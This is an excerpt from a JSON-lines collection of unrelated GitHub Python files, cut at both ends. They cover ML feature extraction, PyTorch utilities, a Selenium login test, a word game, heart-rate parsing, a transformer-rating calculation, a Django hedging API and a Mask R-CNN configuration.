rep[:,c:c+temp] = extractFeatureAll(h5file_freq , methodOne , list_param[i] , mat_bool_extract_signal[i] )\n i+=1\n c+=temp\n \n # close the bar\n sys.stdout.write(\"\\b\")\n sys.stdout.write(\"=|\\n\")\n \n if save:\n temp_var_file = open(\"design_matrix/\" +name_save + '.txt','wb')\n pickle.dump(rep , temp_var_file)\n temp_var_file.close()\n \n #Use next 3 lines to read\n # temp_var_file = open(name_save + '.txt','rb')\n # rep = pickle.load(temp_var_file)\n # temp_var_file.close()\n \n #np.savetxt( name_save + '.txt' , rep , delimiter=',', fmt=\"%s\")\n \n return rep\n\n## File handling\n\ndef objectFromFile( file_path ):\n temp_var_file = open(file_path ,'rb')\n rep = pickle.load(temp_var_file)\n temp_var_file.close()\n return rep\n\ndef concatenateDesignMatricesFromPath( file_path1 , file_path2 , name_save = None ):\n rep = np.concatenate( (objectFromFile(file_path1), objectFromFile(file_path2)) , axis = 1)\n if not name_save is None:\n temp_var_file = open(\"design_matrix/\" + name_save + '.txt','wb')\n pickle.dump(rep , temp_var_file)\n temp_var_file.close()\n return rep\n\ndef concatenateDesignMatrices( mat1 , mat2 , name_save = None ):\n rep = np.concatenate( (mat1 , mat2) , axis = 1)\n if not name_save is None:\n temp_var_file = open(\"design_matrix/\" + name_save + '.txt','wb')\n pickle.dump(rep , temp_var_file)\n temp_var_file.close()\n return rep\n\n#def labelsCsv2Txt( file_path , name_save ):\n# labels = np.loadtxt(file_path, delimiter=',', skiprows=1, usecols=range(1, 2)).astype('int')\n# temp_var_file = open('data/' + name_save + '.txt','wb')\n# pickle.dump(labels , temp_var_file)\n# temp_var_file.close()\n\n## to do some testing\n# pseudo-h5 file with 3 keys (3 indicators), and 3 samples, of length 29 each\ndico = {}\ndico[\"cle1\"] = [np.arange(1,30) , np.random.normal(10,5,29) , np.arange(2,31) , np.random.uniform(12,45,29) ]\ndico[\"cle2\"] = [np.arange(2,31), np.arange(1,30) , np.random.uniform(12,45,29) , np.random.normal(12,6,29)]\ndico[\"cle3\"] = [np.random.normal(42,1,29), np.random.uniform(12,45,29), np.arange(2,31),np.arange(10,39)]\n\nmat_bool_test = np.array( [ [ 1,1,1 ] , [0,1,1] , [1,0,0] ] )\n \n# print(extractMultiFeatureAll(dico , [nbPikesOne , methodTestOne ] , [ [5,4] , [0] ] , mat_bool_test))\n# print(extractMultiFeatureAll(dico , [nbPikesOne , methodTestOne , stdDeviationNbOne] , [ [5,4] , [0] , [10] ] , mat_bool_test))\n\n## Saving labels as .txt\n#labelsCsv2Txt( 'data/train_y.csv' , 'train_y' )\n","repo_name":"ALEXHERBERTCENTRALE/DREEM_PROJECT","sub_path":"feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":14217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42113675455","text":"import torch #libreria para el aprendizaje automatico\nimport torch.nn as nn\n\n\nclass NeuralNet(nn.Module):\n def __init__(self, tamanio_de_entrada, tamanio_oculto, numero_de_clases):\n super(NeuralNet, self).__init__()\n self.l1 = nn.Linear(tamanio_de_entrada, tamanio_oculto) \n self.l2 = nn.Linear(tamanio_oculto, tamanio_oculto) \n self.l3 = nn.Linear(tamanio_oculto, numero_de_clases)\n self.relu = nn.ReLU()\n \n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n out = self.relu(out)\n out = self.l3(out)\n # sin activación y sin softmax al final\n return out","repo_name":"alexescalante1/CHATBOT-PsicoRobo-v2.0","sub_path":"modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20124049805","text":"'''Some helper functions for PyTorch, including:\n - get_mean_and_std: calculate the mean and std value of dataset.\n - msr_init: net parameter initialization.\n - progress_bar: progress bar mimic xlua.progress.\n'''\nimport os\nimport sys\nimport time\nimport errno\nimport shutil\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torchvision.utils as vutils\nfrom typing import List\nimport numpy as np\nimport matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n__all__ = [\"get_mean_and_std\", \"progress_bar\", \"format_time\",\n 'adjust_learning_rate', 'AverageMeter', 'Logger', 'mkdir_p']\n\n\ndef merge(x):\n return 2 * x - 1.\n\n\ndef get_mean_and_std(dataset):\n '''Compute the mean and std value of dataset.'''\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=True, num_workers=2)\n print('==> Computing mean and std..')\n mean, std = 0, 0\n for inputs, targets in dataloader:\n mean += inputs[:, 0, :, :].mean()\n std += inputs[:, 0, :, :].std()\n mean.div_(len(dataset))\n std.div_(len(dataset))\n return mean, std\n\n\ndef init_params(net):\n '''Init layer parameters.'''\n for m in net.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal(m.weight, mode='fan_out')\n if m.bias:\n init.constant(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant(m.weight, 1)\n init.constant(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal(m.weight, std=1e-3)\n if m.bias:\n init.constant(m.bias, 0)\n\n\n# _, term_width = os.popen('stty size', 'r').read().split()\n# term_width = int(term_width)\n\nTOTAL_BAR_LENGTH = 65.\nlast_time = time.time()\nbegin_time = last_time\n\n\ndef progress_bar(current, total, msg=None):\n global last_time, begin_time\n if current == 0:\n begin_time = time.time() # Reset for new bar.\n\n cur_len = int(TOTAL_BAR_LENGTH * current / total)\n rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1\n\n sys.stdout.write(' [')\n for i in range(cur_len):\n sys.stdout.write('=')\n sys.stdout.write('>')\n for i in range(rest_len):\n sys.stdout.write('.')\n sys.stdout.write(']')\n\n cur_time = time.time()\n step_time = cur_time - last_time\n last_time = cur_time\n tot_time = cur_time - begin_time\n\n L = []\n L.append(' Step: %s' % format_time(step_time))\n L.append(' | Tot: %s' % format_time(tot_time))\n if msg:\n L.append(' | ' + msg)\n\n msg = ''.join(L)\n sys.stdout.write(msg)\n # for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):\n # sys.stdout.write(' ')\n\n # Go back to the center of the bar.\n # for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):\n # sys.stdout.write('\\b')\n sys.stdout.write(' %d/%d ' % (current + 1, total))\n\n if current < total - 1:\n sys.stdout.write('\\r')\n else:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef format_time(seconds):\n days = int(seconds / 3600 / 24)\n seconds = seconds - days * 3600 * 24\n hours = int(seconds / 3600)\n seconds = seconds - hours * 3600\n minutes = int(seconds / 60)\n seconds = seconds - minutes * 60\n secondsf = int(seconds)\n seconds = seconds - secondsf\n millis = int(seconds * 1000)\n\n f = ''\n i = 1\n if days > 0:\n f += str(days) + 'D'\n i += 1\n if hours > 0 and i <= 2:\n f += str(hours) + 'h'\n i += 1\n if minutes > 0 and i <= 2:\n f += str(minutes) + 'm'\n i += 1\n if secondsf > 0 and i <= 2:\n f += str(secondsf) + 's'\n i += 1\n if millis > 0 and i <= 2:\n f += str(millis) + 'ms'\n i += 1\n if f == '':\n f = '0ms'\n return f\n\n\ndef write_record(file_path, str):\n if not os.path.exists(file_path):\n # os.makedirs(file_path)\n os.system(r\"touch {}\".format(file_path))\n f = open(file_path, 'a')\n f.write(str)\n f.close()\n\n\ndef count_parameters(model, all=True):\n # If all= Flase, we only return the trainable parameters; tested\n return sum(p.numel() for p in model.parameters() if p.requires_grad or all)\n\n\ndef adjust_learning_rate(optimizer, epoch, lr, factor=0.1, step=30):\n \"\"\"Sets the learning rate to the initial LR decayed by factor every step epochs\"\"\"\n lr = lr * (factor ** (epoch // step))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\n\nclass Logger(object):\n '''Save training process to log file with simple plot function.'''\n\n def __init__(self, fpath, title=None, resume=False):\n self.file = None\n self.resume = resume\n self.title = '' if title == None else title\n if fpath is not None:\n if resume:\n self.file = open(fpath, 'r')\n name = self.file.readline()\n self.names = name.rstrip().split('\\t')\n self.numbers = {}\n for _, name in enumerate(self.names):\n self.numbers[name] = []\n\n for numbers in self.file:\n numbers = numbers.rstrip().split('\\t')\n for i in range(0, len(numbers)):\n self.numbers[self.names[i]].append(numbers[i])\n self.file.close()\n self.file = open(fpath, 'a')\n else:\n self.file = open(fpath, 'w')\n\n def set_names(self, names):\n if self.resume:\n pass\n # initialize numbers as empty list\n self.numbers = {}\n self.names = names\n for _, name in enumerate(self.names):\n self.file.write(name)\n self.file.write('\\t')\n self.numbers[name] = []\n self.file.write('\\n')\n self.file.flush()\n\n def append(self, numbers):\n assert len(self.names) == len(numbers), 'Numbers do not match names'\n for index, num in enumerate(numbers):\n self.file.write(\"{0:.6f}\".format(num))\n self.file.write('\\t')\n self.numbers[self.names[index]].append(num)\n self.file.write('\\n')\n self.file.flush()\n\n def close(self):\n if self.file is not None:\n self.file.close()\n\n\ndef mkdir_p(path):\n '''make dir if not exist'''\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef save_model(net, optimizer, epoch, path, **kwargs):\n state = {\n 'net': net.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch': epoch\n }\n for key, value in kwargs.items():\n state[key] = value\n torch.save(state, path)\n\n\ndef save_binary_img(tensor, file_path=\"./val.png\", nrow=8):\n # tensor [b,1,w,h]\n predicted = torch.sigmoid(tensor) > 0.5\n vutils.save_image(predicted.float(), file_path, nrow=nrow)\n\n\ndef plot_spectrum(spectrums: List[torch.Tensor], labels: List[str], save_path: str = \"./spectrum.png\"):\n assert len(spectrums) >= 1\n assert len(spectrums) == len(labels)\n\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n markers = ['o', 'v', 's', '*', 'p', '+', 'x']\n spectrums = torch.stack(spectrums) # [n, batch, 182, 2]\n print(f\"spectrums shape: {spectrums.shape}\")\n spectrums = spectrums.permute(1, 0, 2, 3)\n batch, n, points, _ = spectrums.shape\n spectrums = spectrums.data.cpu().numpy()\n plt.figure(figsize=(9 * batch, 6))\n for i in range(0, batch):\n i_batch = spectrums[i]\n plt.subplot(1, batch, i + 1)\n for j in range(0, n):\n j_data = i_batch[j] # j in n data / i in batch\n plt.plot(j_data[:, 0], j_data[:, 1], color=colors[j], marker=markers[j], label=labels[j])\n plt.legend()\n plt.title(f\"sample_No_{i + 1}\")\n plt.tight_layout()\n plt.savefig(save_path, bbox_inches='tight', dpi=200)\n plt.close()\n\n # for i in range(0, len(spectrums)):\n # spectrum_batch = spectrums[i].data.cpu().numpy()\n # label = labels[i]\n # for j in range(0, spectrums[0].shape[0]):\n # spectrum = spectrums[i][j].data.cpu().numpy()\n #\n # plt.plot(spectrum[:,0], spectrum[:,1], label=label)\n # plt.legend()\n # plt.savefig(save_path, bbox_inches='tight', dpi=200)\n # plt.close()\n\n\ndef plot_amplitude(spectrum_list: List[torch.Tensor], labels: List[str], save_path: str = \"./spectrum.png\"):\n assert len(spectrum_list) >= 1\n assert len(spectrum_list) == len(labels)\n x_range = np.linspace(600, 1200, 61)\n\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n markers = ['o', 'v', 's', '*', 'p', '+', 'x']\n amplitude_list = []\n for spectrum in spectrum_list:\n amplitude_list.append(spectrum[:, :, 0])\n\n amplitudes = torch.stack(amplitude_list, dim=2) # [batch, 183, n]\n amplitudes = amplitudes.permute(0, 2, 1) # [batch, n, 183]\n batch, n, points = amplitudes.shape\n amplitudes = amplitudes.data.cpu().numpy()\n plt.figure(figsize=(9 * batch, 6*3))\n # plot amplitude\n for nnn in range(3):\n for i in range(0, batch):\n i_batch = amplitudes[i] # [n, 183]\n plt.subplot(3, batch, batch*nnn+i+1)\n for j in range(0, n):\n j_data = i_batch[j] # j in n data / i in batch [183]\n plt.plot(x_range, j_data[61*nnn:61*(nnn+1)], color=colors[j], marker=markers[j], label=labels[j])\n plt.legend()\n plt.title(f\"amplitude{nnn+1} sample_No_{i + 1}\")\n\n\n plt.tight_layout()\n plt.savefig(save_path, bbox_inches='tight', dpi=150)\n plt.close()\n\n\ndef demo():\n a = torch.rand(5, 10, 2)\n b = torch.rand(5, 10, 2)\n plot_spectrum([a, b], [\"a\", \"b\"])\n\n\n# demo()\n","repo_name":"yellowbeango/VAE_NSF","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17574801435","text":"# -- coding: utf-8 --\n\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\n\nclass PythonLogin(unittest.TestCase):\n\n def test_login_chrome(self):\n ser = Service('../chromedriver.exe')\n op = webdriver.ChromeOptions()\n driver = webdriver.Chrome(service=ser, options=op)\n driver.get(\"https://stage.www.vtbconnect.ru/login\")\n self.assertIn(u\"Авторизация\", driver.title)\n elem = driver.find_elements(By.CSS_SELECTOR, '[type=\"text\"][class=\"ant-input ant-input-lg\"]')\n elem[0].send_keys('sp.23@mail.ru')\n elem1 = driver.find_element(By.CSS_SELECTOR, '[type=\"password\"][class=\"ant-input ant-input-lg\"]')\n elem1.send_keys(\"111\")\n driver.find_element(By.CSS_SELECTOR, '[type=\"submit\"][class*=\"ant-btn Login__form-button\"]').click()\n self.assertIn(u\"ВТБ Бизнес Коннект\", driver.title)\n print('login OK')\n assert \"No results found.\" not in driver.page_source\n driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"Luda-Glazova/Autotests","sub_path":"Old/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1253011232","text":"from words import words as w\r\n\r\nimport random\r\n\r\nx = random.choice(w)\r\n\r\nres = ''\r\nfor i in range(len(x)):\r\n res += '-'\r\n\r\nprint(f\"Men {len(x)}xonali son o'yladim . Topaolasizmi?\", '\\n', res)\r\n\r\nallW = ''\r\ncount = 0\r\n\r\nalpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',\r\n 'w', 'x', 'y', 'z', \"g'\", \"'\"]\r\n\r\nwhile True:\r\n count += 1\r\n\r\n top = input(f\"harf kiriting: \")\r\n if top not in alpha:\r\n print('bu harf emas')\r\n continue\r\n\r\n if 1 < len(top):\r\n print('iltimos 1ta ', end='')\r\n continue\r\n if top in allW:\r\n print(f\"siz {top} harfini oldinroq kiritdingiz.Boshqa \", end='')\r\n continue\r\n\r\n allW += top\r\n for i in range(len(x)):\r\n if top == x[i]:\r\n res = res[:i] + top + res[i + 1:]\r\n print(res)\r\n\r\n if top in x:\r\n print(f\"{top} harfi to'g'ri\")\r\n\r\n if top not in x:\r\n print(f\"{top} harfi men o'ylagan so'z ichida yo'q\")\r\n\r\n if res == x:\r\n print(f\"tabriklayman {x} so'zini {count}ta urinishda topdingiz\")\r\n print(f\"hozirgacha kiritgan harflaringiz {allW}\")\r\n","repo_name":"Saidahmad177/findWord","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73649570384","text":"#!/usr/bin/env python3\n\nimport os\nimport csv\nfrom datetime import datetime, timedelta\n\ndef gen_hr_tuples(filename):\n folder = \"heart_rate_files\"\n full_path = os.path.join(folder, filename)\n with open(full_path, newline=\"\") as csvfile:\n reader = csv.reader(csvfile)\n\n # skip meta data\n for i in range(14):\n next(reader)\n\n # get start time\n _, starttime_str, *_ = next(reader)\n starttime = datetime.strptime(starttime_str, \"%Y-%m-%d %H:%M:%S +0000\")\n\n next(reader) # skip header\n\n for sec, hr, *_ in reader:\n dt = starttime + timedelta(seconds=int(sec)-1)\n yield (dt, int(hr))\n\nif __name__ == \"__main__\":\n filename = \"2020-5-24-1.csv\"\n full_path = os.path.join(folder, filename)\n for pair in gen_hr_tuples(full_path):\n print(pair)\n","repo_name":"buzzen/rainbow_trace","sub_path":"hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26718227184","text":"with open('day4-input', 'r') as file:\n data = sorted([l.strip('\\n') for l in file])\nimport numpy as np\n\nGUARDs = {}\nGUARD = None\nGUARD_asleep = False\nGUARD_sleeptime = 0\n\ndef parse(line):\n global GUARD, GUARD_asleep, GUARD_sleeptime\n date, time, *event = line.split()\n date = date.lstrip('[')\n time = time.rstrip(']')\n minute = int(time.partition(':')[2])\n if event[0] == 'Guard':\n if GUARD_asleep and GUARD:\n GUARDs[GUARD][GUARD_sleeptime:minute] += 1\n GUARD = int(event[1].lstrip('#'))\n if GUARD not in GUARDs:\n GUARDs[GUARD] = np.zeros((60))\n GUARD_asleep = False\n elif event[0] == 'wakes':\n GUARD_asleep = False\n if GUARD:\n GUARDs[GUARD][GUARD_sleeptime:minute] += 1\n else: # falls asleep\n GUARD_asleep = True\n GUARD_sleeptime = minute\n\n\nfor line in data:\n parse(line)\n\nmax_mins = 0\nmax_g = None\nfor k, v in GUARDs.items():\n val = v.sum()\n if val > max_mins:\n max_mins = val\n max_g = k\nbiggest_minute = GUARDs[max_g].argmax()\nprint(max_g*biggest_minute) # Part 1\n\n\nmax_mins_2 = 0\nmax_g_2 = None\nfor k, v in GUARDs.items():\n val = v.max()\n if val > max_mins_2:\n max_mins_2 = val\n max_g_2 = k\nprint(max_g_2*GUARDs[max_g_2].argmax()) # Part 2\n","repo_name":"Birdulon/AdventOfCode","sub_path":"2018/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13077126893","text":"'''Trocando o valor entre variáveis'''\r\n\r\n#em modo normal é:\r\n\r\nx = 10\r\ny = 'Victor'\r\n\r\nz = x\r\nx = y\r\ny = z\r\n\r\nprint(f'x={x} e y={y}')\r\n\r\n#em python a inversão de valores fica da seguinte forma\r\n\r\nx = 10\r\ny = 'Victor'\r\n\r\nx, y = y, x\r\nprint(f'x={x} e y={y}')\r\n\r\n\r\n#inversao com mais variaveis\r\nx = 10\r\ny = 'Victor'\r\nz = 'Pereira'\r\n\r\nx, y, z = z, x, y\r\nprint(f'x={x} e y={y} e z={z}')","repo_name":"victorrrp/Python-Intermediario","sub_path":"aula18_curso.py","file_name":"aula18_curso.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30596069313","text":"#This program calculates the maximum allowed loading factor giving a existing load and ambient temp profiles.\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math\r\n\r\nTOR = 65\r\nR = 3.34375\r\nn = 0.8\r\nTAO = 8.659052158\r\nTAOW = 59\r\nHR = 1.98835\r\n\r\nbest = pd.read_csv('best.csv')\r\nbest = best['min'].tolist()\r\n##Amb = best[0:24]\r\n#mid = pd.read_excel('mid.xlsx')\r\n#mid = mid['mid'].tolist()\r\n#worst = pd.read_excel('worst.xlsx')\r\n#worst = worst['max'].tolist()\r\n#actual = pd.read_excel('actual.xlsx')\r\n#actual = actual['actual'].tolist()\r\ntr = pd.read_excel('TRs.xlsx')\r\ntr1 = tr['6.4TR'].tolist()\r\n\r\ndef maxload(Load,Amb):\r\n a = 0.5\r\n AgingF = 0\r\n while AgingF<=1:\r\n Loada = np.array(Load)*a #scaled load by factor a\r\n Loada = Loada.tolist()\r\n Factor = []\r\n UTOL = []\r\n UHSL = []\r\n TOL = []\r\n HSL = []\r\n TOi = 0\r\n Hi = 0\r\n for i in range (0,24):\r\n UTO = TOR*((Loada[i]**2*R+1)/(R+1))**n\r\n UTOL.append(UTO)\r\n UHS = HR*Loada[i]**(2*n)\r\n UHSL.append(UHS)\r\n for i in range (0,20):\r\n for j in range (0,24):\r\n TO = (UTOL[j]-TOi)*(1-math.exp(-1/TAO))+TOi\r\n TOL.append(TO)\r\n TOi = TOL[-1]\r\n HS = (UHSL[j]-Hi)*(1-math.exp(-60/TAOW))+Hi\r\n HSL.append(HS)\r\n Hi = HSL[-1]\r\n i= i+1\r\n TOL = TOL[-24:]\r\n HSL = HSL[-24:]\r\n for i in range (0,24):\r\n HSE = Amb[i]+TOL[i]+HSL[i]\r\n AF = math.exp((15000/383)-(15000/(HSE+273)))\r\n Factor.append(AF) \r\n AgingF = np.mean(Factor)\r\n a = a+0.02\r\n maxload = max(Load)*(a-0.04) #revert to original value before exceeding limit\r\n print(max(Load),a)\r\n return maxload\r\n\r\nloadmax = []\r\nfor i in range (0,365):\r\n Amb = best[i*24:i*24+24]\r\n Load = tr1[i*24:i*24+24]\r\n mload = max(Load)\r\n Load = np.array(Load)/mload # normalize the actual loading profile to a 1.0 p.u. profile\r\n Load = Load.tolist()\r\n lmax = maxload(Load,Amb)\r\n loadmax.append(lmax)\r\n","repo_name":"jsun66/Dynamic-Rating-Forecast-for-Long-term-Power-Transformer-Planning","sub_path":"Rating.py","file_name":"Rating.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7237397823","text":"# Create your views here.\nfrom datetime import datetime, timedelta\n\nimport pandas as pd\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom scripts.liquidation_threshold import LiquidationThreshold\nfrom services import TokenHistoricalData\nfrom tokens import TokenHistoricalDataSerializer\nfrom tokens.serializers.liquidation_serializer import LiquidationSerializer\nfrom utilities import datetime_utilities\n\n\nclass TokensViewset(GenericViewSet):\n def historical_data(self, request):\n request_body = request.query_params\n self.serializer_class = TokenHistoricalDataSerializer\n serializer = self.serializer_class(data=request_body)\n serializer.is_valid(raise_exception=True)\n validated_data = serializer.validated_data\n result = {\"message\": None, \"data\": None}\n print(validated_data)\n\n token_historical_data = TokenHistoricalData()\n try:\n token_historical_data = token_historical_data.get_historical_data(\n **validated_data\n )\n self._save_df_to_csv(token_historical_data, validated_data[\"token\"])\n result[\"data\"] = token_historical_data\n except Exception as e:\n print(\"Token Historical data API error: {}\".format(str(e)))\n result[\"message\"] = str(e)\n\n return Response(data=result, status=status.HTTP_200_OK)\n\n def liquidation_threshold(self, request):\n \"\"\"\n Returns liquidation threshold based on past 3 months of data. Can gather data more further in the past.\n Get threshold for each month in the past 3 months, and calculate the mean = acceptable liquidation_threshold\n \"\"\"\n\n request_body = request.query_params\n self.serializer_class = LiquidationSerializer\n serializer = self.serializer_class(data=request_body)\n serializer.is_valid(raise_exception=True)\n validated_data = serializer.validated_data\n\n result = {\"message\": None, \"data\": {\"thresholds\": []}}\n timestamps = self.get_past_timestamps()\n\n lt = LiquidationThreshold()\n liquidation_threshold = 0\n try:\n for timestamp in timestamps:\n threshold_obj = {}\n validated_data[\"latest_timestamp\"] = timestamp\n liquidation_threshold += lt.get_liquidation_threshold(**validated_data)\n threshold_obj[\"timestamp\"] = timestamp\n threshold_obj[\"threshold_value\"] = liquidation_threshold\n result[\"data\"][\"thresholds\"].append(threshold_obj)\n\n average_liquidation_threshold = liquidation_threshold / len(timestamps)\n result[\"data\"][\"aggregated_threshold\"] = average_liquidation_threshold\n\n except Exception as e:\n print(\"Liqudation Threshold error: {}\".format(str(e)))\n result[\"message\"] = str(e)\n\n return Response(data=result, status=status.HTTP_200_OK)\n\n def get_past_timestamps(self):\n current_timestamp = datetime.utcnow().timestamp()\n time_1_month_ago = (datetime.utcnow() - timedelta(days=31)).timestamp()\n time_2_months_ago = (\n datetime.fromtimestamp(time_1_month_ago) - timedelta(days=31)\n ).timestamp()\n timestamps = [current_timestamp, time_1_month_ago, time_2_months_ago]\n return timestamps\n\n def _save_df_to_csv(self, req_data, token):\n data_from = datetime_utilities.convert_epoch_to_utcdatetime(\n req_data[\"Data\"][\"TimeFrom\"]\n )\n data_to = datetime_utilities.convert_epoch_to_utcdatetime(\n req_data[\"Data\"][\"TimeTo\"]\n )\n req_data[\"Data\"][\"TimeFrom\"] = data_from\n req_data[\"Data\"][\"TimeTo\"] = data_to\n max_price = 0\n for i, obj in enumerate(req_data[\"Data\"][\"Data\"]):\n req_data[\"Data\"][\"Data\"][i][\n \"time\"\n ] = datetime_utilities.convert_epoch_to_utcdatetime(obj[\"time\"])\n price = req_data[\"Data\"][\"Data\"][i][\"high\"]\n max_price = max(max_price, price)\n\n req_data[\"Data\"][\"maxima\"] = max_price\n df = pd.DataFrame(req_data[\"Data\"])\n df.to_csv(\n \"/Users/prithvirajmurthy/Desktop/historical_data_files/{}_data_from:{}_to:{}.csv\".format(\n token, data_from, data_to\n )\n )\n","repo_name":"CruizeFinance/HedgingScripts","sub_path":"tokens/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38180516160","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Mask R-CNN Demo\n# \n# A quick intro to using the pre-trained model to detect and segment objects.\n\n\n\nimport os\nimport sys\nimport random\nimport math\nimport numpy as np\nimport skimage.io\nfrom skimage.measure import find_contours\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches, lines\nfrom matplotlib.patches import Polygon\nimport time\nimport cv2\nimport glob\nfrom copy import deepcopy\nimport random\nimport colorsys\nimport json\nimport argparse\nfrom datetime import datetime\nfrom shutil import copyfile\n\n\n\nhome = os.path.expanduser('~')\nmedia_home = home.replace(\"/home\", \"/media\")\n\n# Root directory of the project\nROOT_DIR = os.path.abspath(home + \"/_projects/Cannabis\")\n\n# Import Mask RCNN\n#sys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn import utils\nfrom mrcnn.config import Config\nimport mrcnn.model as modellib\n#from mrcnn import visualize\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Local path to trained weights file\nCOCO_MODEL_PATH = os.path.join('/media/j5/5TB/NAIP_Imagery/2016_NAIP_CNNabis_4band/logs/cnnabis_naip_2016_400bg_minified20191003T1710/mask_rcnn_cnnabis_naip_2016_400bg_minified_0024.h5')\n\n# Directory of images to run detection on\nIMAGE_DIR = '/media/j5/5TB/NAIP_Imagery/2016_NAIP_CNNabis_4band/train2016'\n\nclass CNNabisConfig(Config):\n\t\"\"\"Configuration for inference on MS COCO.\n\tDerives from the base Config class and overrides values specific\n\tto the COCO dataset.\n\t\"\"\"\n\t# Give the configuration a recognizable name\n\tNAME = \"CNNabis_inference\"\n\t# Uncomment to train on 8 GPUs (default is 1)\n\t# GPU_COUNT = 8\n\tIMAGES_PER_GPU = 2\n\t# Number of classes (including background)\n\tNUM_CLASSES = 1 + 7 # CNNabis has 6 classes + 1 back ground\n\t# NUM_CLASSES = 1 + 6 # CNNabis has 6 classes \n\t# Use smaller anchors because our image and objects are small\n\t#RPN_ANCHOR_SCALES = ( 8, 16, 32, 64, 96, 128) # failed?!\n\t#RPN_ANCHOR_SCALES = ( 16, 64, 128, 256, 312) # anchor side in pixels\n\t#RPN_ANCHOR_SCALES = ( 32, 64, 128, 256, 384) # anchor side in pixels\n\t#RPN_ANCHOR_SCALES = ( 32, 48, 64, 128, 256) # not small enough to big enough\n\tRPN_ANCHOR_SCALES = (16, 32, 64, 128, 256) # The RPN ratios allow us to capture smaller objects, this setting seems to be a good fit for the imagery, (ponds, and outdoor grows at least)\n\t#RPN_ANCHOR_SCALES = ( 64, 256, 384, 512, 768) # this is too big!\n\t# Detection values\n\tDETECTION_MIN_CONFIDENCE = 0.01\n\t# 